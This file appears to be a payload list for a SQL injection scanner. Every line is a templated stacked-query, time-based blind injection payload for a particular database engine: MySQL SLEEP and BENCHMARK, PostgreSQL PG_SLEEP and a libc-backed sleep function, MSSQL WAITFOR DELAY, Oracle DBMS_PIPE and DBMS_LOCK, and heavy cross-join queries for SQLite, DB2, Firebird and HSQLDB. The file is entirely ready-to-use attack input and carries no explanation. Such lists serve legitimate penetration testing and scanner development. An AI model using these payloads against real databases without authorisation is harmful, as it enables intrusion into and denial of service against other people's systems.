{WHERE1} ;SELECT SLEEP({SLEEPTIME})#
{WHERE1} ;SELECT SLEEP({SLEEPTIME})
{WHERE1} ;(SELECT * FROM (SELECT(SLEEP({SLEEPTIME}))){RANDSTR})#
{WHERE1} ;SELECT BENCHMARK({SLEEPTIME}000000,MD5('{RANDSTR}')) #
{WHERE1} ;(SELECT * FROM (SELECT(SLEEP({SLEEPTIME}))){RANDSTR})
{WHERE1} ;SELECT BENCHMARK({SLEEPTIME}000000,MD5('{RANDSTR}'))
{WHERE1} ;SELECT PG_SLEEP({SLEEPTIME}) --
{WHERE1} ;SELECT COUNT(*) FROM GENERATE_SERIES(1,{SLEEPTIME}000000)--
{WHERE1} ;SELECT COUNT(*) FROM GENERATE_SERIES(1,{SLEEPTIME}000000)
{WHERE1} ;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep({SLEEPTIME})--
{WHERE1} ;SELECT PG_SLEEP({SLEEPTIME})
{WHERE1} ;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep({SLEEPTIME})
{WHERE1} ;WAITFOR DELAY '0:0:{SLEEPTIME}' --
{WHERE1} ;WAITFOR DELAY '0:0:{SLEEPTIME}'
{WHERE1} ;DECLARE @x CHAR(9);SET @x=0x303a303a3{SLEEPTIME};WAITFOR DELAY @x --
{WHERE1} ;SELECT DBMS_PIPE.RECEIVE_MESSAGE('{RANDSTR}',{SLEEPTIME}) FROM DUAL
{WHERE1} ;DECLARE @x CHAR(9);SET @x=0x303a303a3{SLEEPTIME};WAITFOR DELAY @x
{WHERE1} ;SELECT DBMS_PIPE.RECEIVE_MESSAGE('{RANDSTR}',{SLEEPTIME}) FROM DUAL
{WHERE1} ;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5 --
{WHERE1} ;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5
{WHERE1} ;BEGIN DBMS_LOCK.SLEEP({SLEEPTIME}); END
{WHERE1} ;BEGIN DBMS_LOCK.SLEEP({SLEEPTIME}); END--
{WHERE1} ;BEGIN USER_LOCK.SLEEP({SLEEPTIME}); END--
{WHERE1} ;BEGIN USER_LOCK.SLEEP({SLEEPTIME}); END
{WHERE1} ;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB({SLEEPTIME}00000000/2))))--
{WHERE1} ;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB({SLEEPTIME}00000000/2))))
{WHERE1} ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3--
{WHERE1} ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3
{WHERE1} ;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4
{WHERE1} ;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3
{WHERE1} ;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4--
{WHERE1} ;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3 --
{WHERE1} ;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR({RANDNUM}),0),{SLEEPTIME}00000000),NULL)--
{WHERE1} ;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),{SLEEPTIME}00000000),NULL)--
{WHERE1} ;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR({RANDNUM}),0),{SLEEPTIME}00000000),NULL)
{WHERE1} ;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),{SLEEPTIME}00000000),NULL)
